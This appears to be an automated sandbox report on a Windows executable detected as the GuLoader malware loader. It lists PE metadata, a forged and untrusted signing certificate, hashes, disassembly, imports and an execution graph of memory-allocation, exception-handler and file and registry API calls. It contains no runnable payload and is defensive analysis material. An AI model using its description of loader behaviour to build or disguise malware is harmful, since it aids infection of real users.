                                                SSDEEP:1536:2/T2X/jN2vxZz0DTHUpouZZbUc6JgjJPQPovf/5AmNHLBH8k29xE+1Gl1c:2bG7N2kDTHUpouZZbUc6JgjJ4PKfRAI6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                Icon Hash:b2a88c96b2ca6a72
                                                Entrypoint:0x40352d
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                Signature Valid:false
                                                Signature Issuer:E=Overorganizes@Unprincipledness.Dy, CN=VRDIOMRAADERNE, OU=Specialprogrammeringer1, O=protoloph, L=Budcykler2, S=Semipiousness8, C=WS
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 1/23/2022 7:50:12 AM 1/23/2023 7:50:12 AM
                                                Subject Chain
                                                • E=Overorganizes@Unprincipledness.Dy, CN=VRDIOMRAADERNE, OU=Specialprogrammeringer1, O=protoloph, L=Budcykler2, S=Semipiousness8, C=WS
                                                Version:3
                                                Thumbprint MD5:A0E586DC6F36D2B05AA723846EDECA3F
                                                Thumbprint SHA-1:5930C7EB1C7523DFDABC8145BE3CB723E4CA4F29
                                                Thumbprint SHA-256:B0DA08480B8FCBD3467A408ABC7F8FC17E3386E77474C654BDF4633441981F3A
                                                Serial:00
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 000003F4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [ebp-14h], ebx
                                                mov dword ptr [ebp-04h], 0040A2E0h
                                                mov dword ptr [ebp-10h], ebx
                                                call dword ptr [004080CCh]
                                                mov esi, dword ptr [004080D0h]
                                                lea eax, dword ptr [ebp-00000140h]
                                                push eax
                                                mov dword ptr [ebp-0000012Ch], ebx
                                                mov dword ptr [ebp-2Ch], ebx
                                                mov dword ptr [ebp-28h], ebx
                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F151CB8E85Ah
                                                lea eax, dword ptr [ebp-00000140h]
                                                mov dword ptr [ebp-00000140h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [ebp-0000012Ch]
                                                mov ecx, dword ptr [ebp-00000112h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [ebp-26h], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [ebp-2Ch], ax
                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                jnc 00007F151CB8E82Ah
                                                and word ptr [ebp-00000132h], 0000h
                                                mov eax, dword ptr [ebp-00000134h]
                                                movzx ecx, byte ptr [ebp-00000138h]
                                                mov dword ptr [00434FB8h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [ebp-0000013Ch]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [ebp-2Ch]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000xe28.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x160d80x14b8.data
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x4c0000xe280x1000False0.378662109375data4.00654037497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x4c2080x2e8dataEnglishUnited States
                                                RT_DIALOG0x4c4f00x100dataEnglishUnited States
                                                RT_DIALOG0x4c5f00x11cdataEnglishUnited States
                                                RT_DIALOG0x4c7100xc4dataEnglishUnited States
                                                RT_DIALOG0x4c7d80x60dataEnglishUnited States
                                                RT_GROUP_ICON0x4c8380x14dataEnglishUnited States
                                                RT_VERSION0x4c8500x294dataEnglishUnited States
                                                RT_MANIFEST0x4cae80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                DescriptionData
                                                LegalCopyrightLesney Products
                                                FileVersion1.2.1
                                                CompanyNameLesney Products
                                                LegalTrademarksLesney Products
                                                CommentsLesney Products
                                                ProductNameLesney Products
                                                FileDescriptionLesney Products
                                                Translation0x0409 0x04b0
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                No network behavior found

                                                Click to jump to process

                                                Click to jump to process

                                                Target ID:0
                                                Start time:11:28:45
                                                Start date:27/01/2022
                                                Path:C:\Users\user\Desktop\9u4xTDR5bG.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\9u4xTDR5bG.exe"
                                                Imagebase:0x400000
                                                File size:95632 bytes
                                                MD5 hash:82C5CDDE9DF0A76E2933C1CD8BFC7887
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:10.8%
                                                  Dynamic/Decrypted Code Coverage:16.5%
                                                  Signature Coverage:23.1%
                                                  Total number of Nodes:1882
                                                  Total number of Limit Nodes:31
                                                  execution_graph 6420 2a564a5 6421 2a564be 6420->6421 6430 2a5591c 6421->6430 6425 2a564f8 6437 2a54f5d 6425->6437 6431 2a55935 6430->6431 6446 2a55694 6431->6446 6433 2a550c1 6434 2a55005 6433->6434 6435 2a55694 2 API calls 6434->6435 6436 2a55026 6435->6436 6436->6425 6438 2a55694 2 API calls 6437->6438 6439 2a54f7c 6438->6439 6440 2a55005 2 API calls 6439->6440 6441 2a564f8 6440->6441 6442 2a54f5d 2 API calls 6441->6442 6443 2a56517 6442->6443 6451 2a54fb6 6443->6451 6447 2a556a4 6446->6447 6450 2a5581e 6446->6450 6448 2a56a18 GetPEB 6447->6448 6449 2a5571c NtAllocateVirtualMemory 6448->6449 6449->6450 6450->6433 6452 2a55694 2 API calls 6451->6452 6453 2a54fd5 6452->6453 6454 2a55005 2 API calls 6453->6454 6455 2a564f8 6454->6455 6456 2a54f5d 2 API calls 6455->6456 6457 2a56517 6456->6457 6458 2a54fb6 2 API calls 6457->6458 6459 2a56534 6458->6459 5468 401941 5469 401943 5468->5469 5474 402da6 5469->5474 5475 402db2 5474->5475 5520 40657a 5475->5520 5478 401948 5480 405c49 5478->5480 5562 405f14 5480->5562 5483 405c71 DeleteFileW 5485 401951 5483->5485 5484 405c88 5486 405db3 5484->5486 5576 40653d lstrcpynW 5484->5576 5486->5485 5605 406873 FindFirstFileW 5486->5605 5488 405cae 5489 405cc1 5488->5489 5490 405cb4 lstrcatW 5488->5490 5577 405e58 lstrlenW 5489->5577 5492 405cc7 5490->5492 5495 405cd7 lstrcatW 5492->5495 5496 405ccd 5492->5496 5497 405ce2 lstrlenW FindFirstFileW 5495->5497 5496->5495 5496->5497 5501 405da8 5497->5501 5518 405d04 5497->5518 5498 405dd1 5608 405e0c lstrlenW CharPrevW 5498->5608 5501->5486 5502 405d8b FindNextFileW 5506 405da1 FindClose 5502->5506 5502->5518 5503 405c01 5 API calls 5505 405de3 5503->5505 5507 405de7 5505->5507 5508 405dfd 5505->5508 5506->5501 5507->5485 5511 40559f 24 API calls 5507->5511 5510 40559f 24 API calls 5508->5510 5510->5485 5513 405df4 5511->5513 5512 405c49 60 API calls 5512->5518 5515 4062fd 36 API calls 5513->5515 5514 40559f 24 API calls 5514->5502 5517 405dfb 5515->5517 5517->5485 5518->5502 5518->5512 5518->5514 5581 40653d lstrcpynW 5518->5581 5582 405c01 5518->5582 5590 40559f 5518->5590 5601 4062fd MoveFileExW 5518->5601 5535 406587 5520->5535 5521 4067aa 5522 402dd3 5521->5522 5553 40653d lstrcpynW 5521->5553 5522->5478 5537 4067c4 5522->5537 5524 406778 lstrlenW 5524->5535 5527 40657a 10 API calls 5527->5524 5528 40668f GetSystemDirectoryW 5528->5535 5530 4066a2 GetWindowsDirectoryW 5530->5535 5531 406719 lstrcatW 5531->5535 5532 40657a 10 API calls 5532->5535 5533 4067c4 5 API calls 5533->5535 5534 4066d1 SHGetSpecialFolderLocation 5534->5535 5536 4066e9 SHGetPathFromIDListW CoTaskMemFree 5534->5536 5535->5521 5535->5524 5535->5527 5535->5528 5535->5530 5535->5531 5535->5532 5535->5533 5535->5534 5546 40640b 5535->5546 5551 406484 wsprintfW 5535->5551 5552 40653d lstrcpynW 5535->5552 5536->5535 5538 4067d1 5537->5538 5540 40683a CharNextW 5538->5540 5541 406847 5538->5541 5544 406826 CharNextW 5538->5544 5545 406835 CharNextW 5538->5545 5558 405e39 5538->5558 5539 40684c CharPrevW 5539->5541 5540->5538 5540->5541 5541->5539 5543 40686d 5541->5543 5543->5478 5544->5538 5545->5540 5554 4063aa 5546->5554 5549 40643f RegQueryValueExW RegCloseKey 5550 40646f 5549->5550 5550->5535 5551->5535 5552->5535 5553->5522 5555 4063b9 5554->5555 5556 4063c2 RegOpenKeyExW 5555->5556 5557 4063bd 5555->5557 5556->5557 5557->5549 5557->5550 5559 405e3f 5558->5559 5560 405e55 5559->5560 5561 405e46 CharNextW 5559->5561 5560->5538 5561->5559 5611 40653d lstrcpynW 5562->5611 5564 405f25 5612 405eb7 CharNextW CharNextW 5564->5612 5567 405c69 5567->5483 5567->5484 5568 4067c4 5 API calls 5574 405f3b 5568->5574 5569 405f6c lstrlenW 5570 405f77 5569->5570 5569->5574 5571 405e0c 3 API calls 5570->5571 5573 405f7c GetFileAttributesW 5571->5573 5572 406873 2 API calls 5572->5574 5573->5567 5574->5567 5574->5569 5574->5572 5575 405e58 2 API calls 5574->5575 5575->5569 5576->5488 5578 405e66 5577->5578 5579 405e78 5578->5579 5580 405e6c CharPrevW 5578->5580 5579->5492 5580->5578 5580->5579 5581->5518 5618 406008 GetFileAttributesW 5582->5618 5585 405c2e 5585->5518 5586 405c24 DeleteFileW 5588 405c2a 5586->5588 5587 405c1c RemoveDirectoryW 5587->5588 5588->5585 5589 405c3a SetFileAttributesW 5588->5589 5589->5585 5591 4055ba 5590->5591 5600 40565c 5590->5600 5592 4055d6 lstrlenW 5591->5592 5593 40657a 17 API calls 5591->5593 5594 4055e4 lstrlenW 5592->5594 5595 4055ff 5592->5595 5593->5592 5598 4055f6 lstrcatW 5594->5598 5594->5600 5596 405612 5595->5596 5597 405605 SetWindowTextW 5595->5597 5599 405618 SendMessageW SendMessageW SendMessageW 5596->5599 5596->5600 5597->5596 5598->5595 5599->5600 5600->5518 5602 40631e 5601->5602 5603 406311 5601->5603 5602->5518 5621 406183 5603->5621 5606 405dcd 5605->5606 5607 406889 FindClose 5605->5607 5606->5485 5606->5498 5607->5606 5609 405dd7 5608->5609 5610 405e28 lstrcatW 5608->5610 5609->5503 5610->5609 5611->5564 5613 405ed4 5612->5613 5615 405ee6 5612->5615 5614 405ee1 CharNextW 5613->5614 5613->5615 5617 405f0a 5614->5617 5616 405e39 CharNextW 5615->5616 5615->5617 5616->5615 5617->5567 5617->5568 5619 405c0d 5618->5619 5620 40601a SetFileAttributesW 5618->5620 5619->5585 5619->5586 5619->5587 5620->5619 5622 4061b3 5621->5622 5623 4061d9 GetShortPathNameW 5621->5623 5648 40602d GetFileAttributesW CreateFileW 5622->5648 5624 4062f8 5623->5624 5625 4061ee 5623->5625 5624->5602 5625->5624 5628 4061f6 wsprintfA 5625->5628 5627 4061bd CloseHandle GetShortPathNameW 5627->5624 5629 4061d1 5627->5629 5630 40657a 17 API calls 5628->5630 5629->5623 5629->5624 5631 40621e 5630->5631 5649 40602d GetFileAttributesW CreateFileW 5631->5649 5633 40622b 5633->5624 5634 40623a GetFileSize GlobalAlloc 5633->5634 5635 4062f1 CloseHandle 5634->5635 5636 40625c 5634->5636 5635->5624 5650 4060b0 ReadFile 5636->5650 5641 40627b lstrcpyA 5643 40629d 5641->5643 5642 40628f 5644 405f92 4 API calls 5642->5644 5645 4062d4 SetFilePointer 5643->5645 5644->5643 5657 4060df WriteFile 5645->5657 5648->5627 5649->5633 5651 4060ce 5650->5651 5651->5635 5652 405f92 lstrlenA 5651->5652 5653 405fd3 lstrlenA 5652->5653 5654 405fac lstrcmpiA 5653->5654 5655 405fdb 5653->5655 5654->5655 5656 405fca CharNextA 5654->5656 5655->5641 5655->5642 5656->5653 5658 4060fd GlobalFree 5657->5658 5658->5635 6460 401c43 6461 402d84 17 API calls 6460->6461 6462 401c4a 6461->6462 6463 402d84 17 API calls 6462->6463 6464 401c57 6463->6464 6465 401c6c 6464->6465 6466 402da6 17 API calls 6464->6466 6467 401c7c 6465->6467 6468 402da6 17 API calls 6465->6468 6466->6465 6469 401cd3 6467->6469 6470 401c87 6467->6470 6468->6467 6471 402da6 17 API calls 6469->6471 6472 402d84 17 API calls 6470->6472 6473 401cd8 6471->6473 6474 401c8c 6472->6474 6476 402da6 17 API calls 6473->6476 6475 402d84 17 API calls 6474->6475 6477 401c98 6475->6477 6478 401ce1 FindWindowExW 6476->6478 6479 401cc3 SendMessageW 6477->6479 6480 401ca5 SendMessageTimeoutW 6477->6480 6481 401d03 6478->6481 6479->6481 6480->6481 7022 404943 7023 404953 7022->7023 7024 404979 7022->7024 7025 404499 18 API calls 7023->7025 7026 404500 8 API calls 7024->7026 7027 404960 SetDlgItemTextW 7025->7027 7028 404985 7026->7028 7027->7024 7029 2a523a0 7030 2a55694 2 API calls 7029->7030 7031 2a523bf 7030->7031 7032 2a54fad 7033 2a54faf 7032->7033 7034 2a54fb6 2 API calls 7033->7034 7035 2a56534 7034->7035 6482 2a550a9 GetPEB 6483 2a50ca8 6484 2a55694 2 API calls 6483->6484 6485 2a50cd1 6484->6485 6486 2a56a18 GetPEB 6485->6486 6487 2a50cde 6486->6487 6488 401e4e GetDC 6489 402d84 17 API calls 6488->6489 6490 401e60 GetDeviceCaps MulDiv ReleaseDC 6489->6490 6491 402d84 17 API calls 6490->6491 6492 401e91 6491->6492 6493 40657a 17 API calls 6492->6493 6494 401ece CreateFontIndirectW 6493->6494 6495 402638 6494->6495 7036 402950 7037 402da6 17 API calls 7036->7037 7039 40295c 7037->7039 7038 402972 7040 406008 2 API calls 7038->7040 7039->7038 7041 402da6 17 API calls 7039->7041 7042 402978 7040->7042 7041->7038 7064 40602d GetFileAttributesW CreateFileW 7042->7064 7044 402985 7045 402a3b 7044->7045 7046 4029a0 GlobalAlloc 7044->7046 7047 402a23 7044->7047 7048 402a42 DeleteFileW 7045->7048 7049 402a55 7045->7049 7046->7047 7050 4029b9 7046->7050 7051 4032b4 31 API calls 7047->7051 7048->7049 7065 4034e5 SetFilePointer 7050->7065 7053 402a30 CloseHandle 7051->7053 7053->7045 7054 4029bf 7055 4034cf ReadFile 7054->7055 7056 4029c8 GlobalAlloc 7055->7056 7057 4029d8 7056->7057 7058 402a0c 7056->7058 7060 4032b4 31 API calls 7057->7060 7059 4060df WriteFile 7058->7059 7061 402a18 GlobalFree 7059->7061 7063 4029e5 7060->7063 7061->7047 7062 402a03 GlobalFree 7062->7058 7063->7062 7064->7044 7065->7054 7066 401956 7067 402da6 17 API calls 7066->7067 7068 40195d lstrlenW 7067->7068 7069 402638 7068->7069 6496 404658 6497 404670 6496->6497 6498 40478a 6496->6498 6501 404499 18 API calls 6497->6501 6499 4047f4 6498->6499 6502 4048be 6498->6502 6505 4047c5 GetDlgItem SendMessageW 6498->6505 6500 4047fe GetDlgItem 6499->6500 6499->6502 6503 404818 6500->6503 6504 40487f 6500->6504 6506 4046d7 6501->6506 6507 404500 8 API calls 6502->6507 6503->6504 6512 40483e SendMessageW LoadCursorW SetCursor 6503->6512 6504->6502 6508 404891 6504->6508 6529 4044bb KiUserCallbackDispatcher 6505->6529 6510 404499 18 API calls 6506->6510 6511 4048b9 6507->6511 6513 4048a7 6508->6513 6514 404897 SendMessageW 6508->6514 6516 4046e4 CheckDlgButton 6510->6516 6533 404907 6512->6533 6513->6511 6518 4048ad SendMessageW 6513->6518 6514->6513 6515 4047ef 6530 4048e3 6515->6530 6527 4044bb KiUserCallbackDispatcher 6516->6527 6518->6511 6522 404702 GetDlgItem 6528 4044ce SendMessageW 6522->6528 6524 404718 SendMessageW 6525 404735 GetSysColor 6524->6525 6526 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 6524->6526 6525->6526 6526->6511 6527->6522 6528->6524 6529->6515 6531 4048f1 6530->6531 6532 4048f6 SendMessageW 6530->6532 6531->6532 6532->6499 6536 405b63 ShellExecuteExW 6533->6536 6535 40486d LoadCursorW SetCursor 6535->6504 6536->6535 7070 402b59 7071 402b60 7070->7071 7072 402bab 7070->7072 7074 402ba9 7071->7074 7076 402d84 17 API calls 7071->7076 7073 40690a 5 API calls 7072->7073 7075 402bb2 7073->7075 7077 402da6 17 API calls 7075->7077 7078 402b6e 7076->7078 7079 402bbb 7077->7079 7080 402d84 17 API calls 7078->7080 7079->7074 7081 402bbf IIDFromString 7079->7081 7083 402b7a 7080->7083 7081->7074 7082 402bce 7081->7082 7082->7074 7088 40653d lstrcpynW 7082->7088 7087 406484 wsprintfW 7083->7087 7086 402beb CoTaskMemFree 7086->7074 7087->7074 7088->7086 6350 40175c 6351 402da6 17 API calls 6350->6351 6352 401763 6351->6352 6353 40605c 2 API calls 6352->6353 6354 40176a 6353->6354 6355 40605c 2 API calls 6354->6355 6355->6354 7089 401d5d 7090 402d84 17 API calls 7089->7090 7091 401d6e SetWindowLongW 7090->7091 7092 402c2a 7091->7092 7093 7320103d 7096 7320101b 7093->7096 7097 732015b6 GlobalFree 7096->7097 7098 73201020 7097->7098 7099 73201027 GlobalAlloc 7098->7099 7100 73201024 7098->7100 7099->7100 7101 732015dd 3 API calls 7100->7101 7102 7320103b 7101->7102 7103 73201000 7104 7320101b 5 API calls 7103->7104 7105 73201019 7104->7105 7109 401563 7110 402ba4 7109->7110 7113 406484 wsprintfW 7110->7113 7112 402ba9 7113->7112 7114 2a55982 7115 2a56a18 GetPEB 7114->7115 7116 2a55992 7115->7116 7117 2a56a18 GetPEB 7116->7117 7118 2a559a8 7117->7118 7119 2a56a18 GetPEB 7118->7119 7120 2a559c3 7119->7120 7121 2a56a18 GetPEB 7120->7121 7122 2a559d9 7121->7122 7123 2a56a18 GetPEB 7122->7123 7124 2a559f1 7123->7124 7125 2a5812b RtlAddVectoredExceptionHandler 7124->7125 7126 2a550c1 7124->7126 7127 2a55d6b 7124->7127 7125->7124 7128 2a5812b RtlAddVectoredExceptionHandler 7127->7128 7129 2a55d7e 7128->7129 7130 2a5812b RtlAddVectoredExceptionHandler 7129->7130 7131 2a55d8f 7130->7131 7132 401968 7133 402d84 17 API calls 7132->7133 7134 40196f 7133->7134 7135 402d84 17 API calls 7134->7135 7136 40197c 7135->7136 7137 402da6 17 API calls 7136->7137 7138 401993 lstrlenW 7137->7138 7140 4019a4 7138->7140 7139 4019e5 7140->7139 7144 40653d lstrcpynW 7140->7144 7142 4019d5 7142->7139 7143 4019da lstrlenW 7142->7143 7143->7139 7144->7142 6537 40166a 6538 402da6 17 API calls 6537->6538 6539 401670 6538->6539 6540 406873 2 API calls 6539->6540 6541 401676 6540->6541 7145 2a53b8f 7146 2a53bc0 7145->7146 7147 2a50903 7146->7147 7148 2a56cd9 GetPEB 7146->7148 7148->7147 6542 7320170d 6548 732015b6 6542->6548 6544 7320176b GlobalFree 6545 73201725 6545->6544 6546 73201740 6545->6546 6547 73201757 VirtualFree 6545->6547 6546->6544 6547->6544 6549 732015bc 6548->6549 6550 732015c2 6549->6550 6551 732015ce GlobalFree 6549->6551 6550->6545 6551->6545 6011 40176f 6012 402da6 17 API calls 6011->6012 6013 401776 6012->6013 6014 401796 6013->6014 6015 40179e 6013->6015 6050 40653d lstrcpynW 6014->6050 6051 40653d lstrcpynW 6015->6051 6018 40179c 6022 4067c4 5 API calls 6018->6022 6019 4017a9 6020 405e0c 3 API calls 6019->6020 6021 4017af lstrcatW 6020->6021 6021->6018 6033 4017bb 6022->6033 6023 406873 2 API calls 6023->6033 6024 406008 2 API calls 6024->6033 6026 4017cd CompareFileTime 6026->6033 6027 40188d 6028 40559f 24 API calls 6027->6028 6030 401897 6028->6030 6029 40559f 24 API calls 6032 401879 6029->6032 6031 4032b4 31 API calls 6030->6031 6034 4018aa 6031->6034 6033->6023 6033->6024 6033->6026 6033->6027 6037 40657a 17 API calls 6033->6037 6039 40653d lstrcpynW 6033->6039 6044 405b9d MessageBoxIndirectW 6033->6044 6047 401864 6033->6047 6049 40602d GetFileAttributesW CreateFileW 6033->6049 6035 4018be SetFileTime 6034->6035 6036 4018d0 FindCloseChangeNotification 6034->6036 6035->6036 6036->6032 6038 4018e1 6036->6038 6037->6033 6040 4018e6 6038->6040 6041 4018f9 6038->6041 6039->6033 6042 40657a 17 API calls 6040->6042 6043 40657a 17 API calls 6041->6043 6045 4018ee lstrcatW 6042->6045 6046 401901 6043->6046 6044->6033 6045->6046 6046->6032 6048 405b9d MessageBoxIndirectW 6046->6048 6047->6029 6047->6032 6048->6032 6049->6033 6050->6018 6051->6019 6052 2a55694 6053 2a556a4 6052->6053 6056 2a5581e 6052->6056 6057 2a56a18 6053->6057 6055 2a5571c NtAllocateVirtualMemory 6055->6056 6058 2a56a8a 6057->6058 6060 2a56a96 6057->6060 6059 2a56cd9 GetPEB 6058->6059 6059->6060 6060->6055 6552 401a72 6553 402d84 17 API calls 6552->6553 6554 401a7b 6553->6554 6555 402d84 17 API calls 6554->6555 6556 401a20 6555->6556 7149 401573 7150 401583 ShowWindow 7149->7150 7151 40158c 7149->7151 7150->7151 7152 402c2a 7151->7152 7153 40159a ShowWindow 7151->7153 7153->7152 7154 401b77 7155 402da6 17 API calls 7154->7155 7156 401b7e 7155->7156 7157 402d84 17 API calls 7156->7157 7158 401b87 wsprintfW 7157->7158 7159 402c2a 7158->7159 6557 40167b 6558 402da6 17 API calls 6557->6558 6559 401682 6558->6559 6560 402da6 17 API calls 6559->6560 6561 40168b 6560->6561 6562 402da6 17 API calls 6561->6562 6563 401694 MoveFileW 6562->6563 6564 4016a0 6563->6564 6565 4016a7 6563->6565 6566 401423 24 API calls 6564->6566 6567 406873 2 API calls 6565->6567 6569 4022f6 6565->6569 6566->6569 6568 4016b6 6567->6568 6568->6569 6570 4062fd 36 API calls 6568->6570 6570->6564 6571 401000 6572 401037 BeginPaint GetClientRect 6571->6572 6573 40100c DefWindowProcW 6571->6573 6575 4010f3 6572->6575 6576 401179 6573->6576 6577 401073 CreateBrushIndirect FillRect DeleteObject 6575->6577 6578 4010fc 6575->6578 6577->6575 6579 401102 CreateFontIndirectW 6578->6579 6580 401167 EndPaint 6578->6580 6579->6580 6581 401112 6 API calls 6579->6581 6580->6576 6581->6580 7165 401503 7166 40150b 7165->7166 7168 40151e 7165->7168 7167 402d84 17 API calls 7166->7167 7167->7168 6582 402c05 SendMessageW 6583 402c2a 6582->6583 6584 402c1f InvalidateRect 6582->6584 6584->6583 7169 404f06 GetDlgItem GetDlgItem 7170 404f58 7 API calls 7169->7170 7176 40517d 7169->7176 7171 404ff2 SendMessageW 7170->7171 7172 404fff DeleteObject 7170->7172 7171->7172 7173 405008 7172->7173 7174 40503f 7173->7174 7177 40657a 17 API calls 7173->7177 7178 404499 18 API calls 7174->7178 7175 40525f 7179 40530b 7175->7179 7190 4052b8 SendMessageW 7175->7190 7212 405170 7175->7212 7176->7175 7184 4051ec 7176->7184 7223 404e54 SendMessageW 7176->7223 7182 405021 SendMessageW SendMessageW 7177->7182 7183 405053 7178->7183 7180 405315 SendMessageW 7179->7180 7181 40531d 7179->7181 7180->7181 7187 405346 7181->7187 7192 405336 7181->7192 7193 40532f ImageList_Destroy 7181->7193 7182->7173 7189 404499 18 API calls 7183->7189 7184->7175 7185 405251 SendMessageW 7184->7185 7185->7175 7186 404500 8 API calls 